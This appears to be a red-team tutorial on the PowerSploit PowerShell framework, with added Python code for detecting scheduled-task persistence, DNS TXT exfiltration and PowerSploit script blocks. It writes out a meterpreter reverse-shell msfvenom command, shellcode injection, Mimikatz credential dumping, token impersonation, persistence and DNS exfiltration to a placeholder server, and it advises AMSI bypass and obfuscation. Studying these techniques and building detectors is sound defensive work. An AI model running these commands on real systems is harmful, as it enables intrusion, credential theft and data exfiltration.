⚠️ Note: PowerSploit is no longer actively maintained and many of its modules are easily detected by modern EDR and antivirus solutions. It remains a valuable tool for learning and experimentation but may require customization or obfuscation to be usable in real-world red team engagements.
Greetings, fellow red teamers and penetration testers! In today’s highly interconnected world, offensive security has evolved significantly. With new tools and techniques appearing regularly, staying ahead of the curve is essential. One powerful framework that continues to hold educational value is PowerSploit—a collection of PowerShell modules for offensive security operations.
In this article, we’ll dive into PowerSploit, explore its capabilities, and provide real-world examples to help you sharpen your offensive tradecraft. Let’s get into it.
What is PowerSploit?
PowerSploit is an open-source project developed by security researchers and enthusiasts. It’s a collection of PowerShell scripts and modules designed to support red teamers and penetration testers in post-exploitation, privilege escalation, persistence, and recon tasks. Its strength lies in flexibility and ease of use in Windows environments—especially where PowerShell is already present.
While the tool is aging and not stealthy out-of-the-box, it remains useful for learning offensive PowerShell concepts and testing detection capabilities.
Setting up PowerSploit
To get started with PowerSploit:
Clone the GitHub repository:
git clone https://github.com/PowerShellMafia/PowerSploit.git
Import the desired module in PowerShell:
cd PowerSploit
Import-Module .\Exfiltration\Invoke-Mimikatz.ps1
💡 You can also download and import individual scripts from the GitHub repo if you prefer not to clone the full project.
PowerSploit Modules
PowerSploit is divided into six main module categories:
- Code Execution
- Script Modification
- Persistence
- Privilege Escalation
- Reconnaissance
- Exfiltration
Let’s look at each category in detail.
🧨 Code Execution
These modules allow you to execute arbitrary code on a target system.
- Invoke-Shellcode: Injects shellcode into memory.
- Invoke-DllInjection: Injects a DLL into a running process.
- Invoke-ReflectivePEInjection: Reflectively loads PE files (DLL/EXE) into memory, avoiding disk writes.
Example: Deploying a Reverse Shell
Generate shellcode using msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.10 LPORT=443 -f powershell
Then execute it:
Invoke-Shellcode -Shellcode 'YOUR_GENERATED_SHELLCODE' -Force
⚠️ Shellcode execution via PowerShell is easily detected by modern EDR tools. This is best used for learning or in controlled labs.
🧪 Script Modification
These modules help evade AV and execution policies.
- Out-EncodedCommand: Encodes a command for powershell.exe -EncodedCommand.
- Out-CompressedDll: Compresses DLLs for use with reflective loaders.
Example: Encoded Execution
$command = 'Get-Process'
$encodedCommand = Out-EncodedCommand -Command $command
powershell.exe -EncodedCommand $encodedCommand
⚠️ EncodedCommand is a well-known bypass and flagged in most environments. This example is for educational purposes only.
🛡️ Persistence
Maintain access after initial compromise.
- New-UserPersistenceOption: User-level persistence (startup folder, registry).
- New-ElevatedPersistenceOption: System-level persistence (services, scheduled tasks).
Example: Daily Scheduled Task
New-UserPersistenceOption -Command "powershell.exe -Command 'YOUR_PAYLOAD_COMMAND'" -Frequency Daily -At "12:00"
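A scheduled task that launches powershell.exe with a hidden window and an encoded payload is exactly the artifact a persistence hunt looks for. The Python below is an added example, not code from the post or from PowerSploit: it audits task definitions in the Task Scheduler XML format (namespace http://schemas.microsoft.com/windows/2004/02/mit/task, the format exported by schtasks /query /xml), extracts each Exec action, and flags script hosts launched with indicators such as -EncodedCommand, -WindowStyle Hidden, -NoProfile, an execution-policy bypass or a download cradle. The two task definitions are constructed for this example; the task names passed to audit_task are hypothetical.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Script hosts that can run arbitrary code from a task action.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Argument patterns worth a second look when the action is a script host.
INDICATORS = [
    ("encoded_command", re.compile(r"(?<!\S)-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden_window", re.compile(r"(?<!\S)-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"(?<!\S)-e[px][a-z]*\s+bypass", re.I)),
    ("no_profile", re.compile(r"(?<!\S)-nop(?:rofile)?(?!\S)", re.I)),
    ("download_cradle", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|(?<![\w-])iex(?![\w-])", re.I)),
]

# Constructed task definitions (not exported from a real host). The encoded payload is benign ('Get-Date').
SUSPICIOUS_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>CORP\\jdoe</Author></RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-01-01T12:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoProfile -WindowStyle Hidden -EncodedCommand RwBlAHQALQBEAGEAdABlAA==</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Example Vendor</Author></RegistrationInfo>
  <Triggers><LogonTrigger /></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Program Files\\Example Vendor\\Updater.exe</Command>
      <Arguments>/check</Arguments>
    </Exec>
  </Actions>
</Task>"""


def _local(tag):
    """Strip the XML namespace from an element tag."""
    return tag.split("}")[-1]


def audit_task(name, xml_text):
    """Summarise a task definition and flag script-host actions carrying evasion indicators."""
    root = ET.fromstring(xml_text)
    triggers_el = root.find("t:Triggers", TASK_NS)
    triggers = [] if triggers_el is None else [_local(t.tag) for t in triggers_el]
    actions = []
    for exec_el in root.findall("t:Actions/t:Exec", TASK_NS):
        command = exec_el.findtext("t:Command", default="", namespaces=TASK_NS).strip()
        arguments = exec_el.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        host = command.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        hits = [label for label, rx in INDICATORS if rx.search(arguments)]
        actions.append({"command": command, "arguments": arguments,
                        "script_host": host in SCRIPT_HOSTS, "indicators": hits})
    return {
        "task": name,
        "author": root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=TASK_NS),
        "run_level": root.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=TASK_NS),
        "triggers": triggers,
        "actions": actions,
        "suspicious": any(a["script_host"] and a["indicators"] for a in actions),
    }
```

The verdict deliberately requires both a script host and at least one indicator: a vendor updater with a daily CalendarTrigger is normal, while powershell.exe with a hidden window and an encoded command almost never is, whatever the trigger.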
🚩 Privilege Escalation
Gain higher privileges on a compromised host.
- Invoke-TokenManipulation: Lists and impersonates access tokens.
- PowerUp: Scans for common privilege escalation opportunities.
Example: Token Impersonation
First, enumerate impersonation candidates:
Invoke-TokenManipulation -Enumerate
Then impersonate a token:
Invoke-TokenManipulation -Impersonate
🎯 There is no -Username parameter. The module impersonates based on available tokens.
🕵️ Reconnaissance
Gather info about the environment.
- Get-NetUser: Lists domain users.
- Get-NetComputer: Lists computers in the domain.
- Get-NetShare: Lists shared folders.
Example: Enumerate Domain Users
Get-NetUser -Filter *
📤 Exfiltration
Extract data stealthily.
- Invoke-Mimikatz: Extracts credentials from memory.
- Invoke-PowerDump: Dumps local SAM password hashes.
- Out-DnsTxt: Exfiltrates data via DNS TXT records.
Example: DNS Exfiltration
Out-DnsTxt -Data "SENSITIVE_DATA" -DnsServer "YOUR_DNS_SERVER"
🛑 EDRs will often block or detect this activity unless heavily obfuscated or tunneled.
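Moving data through TXT records leaves a distinctive footprint in resolver logs: one client, one domain, many unique long high-entropy labels. The Python below is an added example, not part of the post or of PowerSploit; it runs that check over constructed resolver log lines in an assumed "timestamp client= qtype= qname=" format, grouping TXT queries by client and registered domain, and flags a group once it has enough unique names whose leftmost labels are long or high-entropy. The thresholds are hypothetical starting points, the registered domain is taken as the last two labels (a real deployment would use a public-suffix list), and the exfil-looking labels are built from a fixed hex alphabet so their entropy is exactly 4.0 bits per character.

```python
import math
import re
from collections import defaultdict

# Constructed resolver log lines (not captured traffic). Assumed format:
#   <timestamp> client=<ip> qtype=<type> qname=<name>
# The exfil-style labels rotate a fixed hex alphabet so each of the 16 symbols appears
# exactly 3 times in 48 characters, giving an entropy of exactly 4.0 bits per character.
_HEX = "0123456789abcdef"
_EXFIL_LABELS = [(_HEX * 4)[i:i + 48] for i in range(6)]

SAMPLE_LOG_LINES = [
    "2024-05-01T10:00:00Z client=10.0.0.5 qtype=A qname=www.example.com",
    "2024-05-01T10:00:01Z client=10.0.0.5 qtype=TXT qname=_dmarc.example.com",
    "2024-05-01T10:00:02Z client=10.0.0.7 qtype=TXT qname=example.com",
] + [
    f"2024-05-01T10:00:{3 + i:02d}Z client=10.0.0.5 qtype=TXT qname={label}.c2-example.test"
    for i, label in enumerate(_EXFIL_LABELS)
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+client=(?P<client>\S+)\s+qtype=(?P<qtype>\S+)\s+qname=(?P<qname>\S+)$")


def parse_line(line):
    """Return the log fields as a dict, or None for a line that does not match the format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def shannon_entropy(text):
    """Bits of entropy per character of the string (0.0 for empty or single-symbol input)."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Split 'data.labels.registered.tld' into (data_part, registered_domain)."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def find_txt_exfil(lines, min_unique=5, min_mean_len=30, min_mean_entropy=3.5):
    """Flag (client, domain) pairs whose TXT queries look like encoded data rather than records."""
    groups = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["qtype"].upper() != "TXT":
            continue
        data, domain = split_name(rec["qname"])
        if data:  # a bare 'example.com TXT' lookup (SPF, verification records) carries no payload
            groups[(rec["client"], domain)].add(data)
    findings = []
    for (client, domain), names in groups.items():
        payloads = [d.replace(".", "") for d in names]
        mean_len = sum(map(len, payloads)) / len(payloads)
        mean_entropy = sum(map(shannon_entropy, payloads)) / len(payloads)
        if len(names) >= min_unique and (mean_len >= min_mean_len or mean_entropy >= min_mean_entropy):
            findings.append({"client": client, "domain": domain, "unique_names": len(names),
                             "mean_label_length": round(mean_len, 1),
                             "mean_entropy": round(mean_entropy, 2)})
    return findings
```

The unique-name count is what separates exfiltration from legitimate TXT traffic such as _dmarc or verification lookups, which are repeated queries for a handful of fixed names.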
Real-World Use Cases
Here are a few situations where PowerSploit can be integrated into a red team workflow:
🔒 Privilege Escalation via Tokens
Invoke-TokenManipulation -Enumerate
Invoke-TokenManipulation -Impersonate
Use after initial compromise to move laterally or elevate privileges.
🕸️ Lateral Movement with PowerShell Remoting
Get-NetComputer -Filter *
Enter-PSSession -ComputerName "TARGET_COMPUTER"
Requires PSRemoting to be enabled and accessible.
🧬 Credential Dumping with Mimikatz
Invoke-Mimikatz
⚠️ Detected instantly in modern environments. Use AMSI bypass or load via obfuscated stager if testing defenses.
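What makes Invoke-Mimikatz and its siblings "detected instantly" is PowerShell script block logging (Event ID 4104), which records the script text the engine actually runs regardless of how it was delivered. The Python below is an added example, not part of the post or of PowerSploit: it reassembles 4104 fragments (long script blocks are logged as several events sharing a ScriptBlockId, ordered by MessageNumber of MessageTotal), strips backticks used to split command names, and matches the PowerSploit function names listed in this article, reporting the module category for each hit. The events are constructed; the "b1" block is split so that a function name only becomes visible after reassembly, and "b4" is missing a fragment to show that an incomplete block is still scanned.

```python
import re
from collections import defaultdict

# PowerSploit function names from the sections above, mapped to their module category.
POWERSPLOIT_FUNCTIONS = {
    "invoke-shellcode": "Code Execution",
    "invoke-dllinjection": "Code Execution",
    "invoke-reflectivepeinjection": "Code Execution",
    "out-encodedcommand": "Script Modification",
    "out-compresseddll": "Script Modification",
    "new-userpersistenceoption": "Persistence",
    "new-elevatedpersistenceoption": "Persistence",
    "invoke-tokenmanipulation": "Privilege Escalation",
    "get-netuser": "Reconnaissance",
    "get-netcomputer": "Reconnaissance",
    "get-netshare": "Reconnaissance",
    "invoke-mimikatz": "Exfiltration",
    "invoke-powerdump": "Exfiltration",
    "out-dnstxt": "Exfiltration",
}
NAME_RE = re.compile(r"(?<![\w-])(" + "|".join(map(re.escape, POWERSPLOIT_FUNCTIONS)) + r")(?![\w-])")

# Constructed 4104-style events (not real logs). Fragments of one script block share a
# ScriptBlockId; "b1" is split mid-name and "b4" is missing its first fragment on purpose.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "b1", "MessageNumber": 1, "MessageTotal": 2, "ScriptBlockText": "function Invoke-Mimi"},
    {"ScriptBlockId": "b1", "MessageNumber": 2, "MessageTotal": 2, "ScriptBlockText": "katz { param($Command) }"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1, "ScriptBlockText": "Get-Net`User -Filter *"},
    {"ScriptBlockId": "b3", "MessageNumber": 1, "MessageTotal": 1, "ScriptBlockText": "Get-ChildItem C:\\Temp"},
    {"ScriptBlockId": "b4", "MessageNumber": 2, "MessageTotal": 2, "ScriptBlockText": "Invoke-Shellcode -Force"},
]


def normalize(script):
    """Lower-case the text and drop backticks, which PowerShell ignores before most letters
    and which are therefore used to split command names; this is a heuristic, not a parser."""
    return script.replace("`", "").lower()


def reassemble(events):
    """Join fragments per ScriptBlockId in MessageNumber order and note whether all arrived."""
    frags = defaultdict(dict)
    totals = {}
    for ev in events:
        frags[ev["ScriptBlockId"]][ev["MessageNumber"]] = ev["ScriptBlockText"]
        totals[ev["ScriptBlockId"]] = ev["MessageTotal"]
    blocks = {}
    for sbid, parts in frags.items():
        text = "".join(parts[n] for n in sorted(parts))
        complete = set(parts) == set(range(1, totals[sbid] + 1))
        blocks[sbid] = {"text": text, "complete": complete}
    return blocks


def scan_script_blocks(events):
    """Return one finding per script block that references a PowerSploit function."""
    findings = []
    for sbid, block in reassemble(events).items():
        names = sorted(set(NAME_RE.findall(normalize(block["text"]))))
        if names:
            findings.append({"script_block_id": sbid, "complete": block["complete"],
                             "matches": [(n, POWERSPLOIT_FUNCTIONS[n]) for n in names]})
    return findings
```

Incomplete blocks are scanned rather than discarded: a fragment that never reached the collector should not hide a hit in the fragments that did.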
Final Thoughts
PowerSploit remains one of the most instructive frameworks for understanding offensive PowerShell. While its techniques are dated in some areas, its modular approach and code clarity make it an outstanding training and testing resource.
For real-world operations, expect to modify, obfuscate, and combine PowerSploit modules with custom tradecraft or C2 frameworks like Empire, Covenant, or Cobalt Strike.
Explore, adapt, and test—always in a legal and ethical environment.
Stay sharp out there, and good hunting.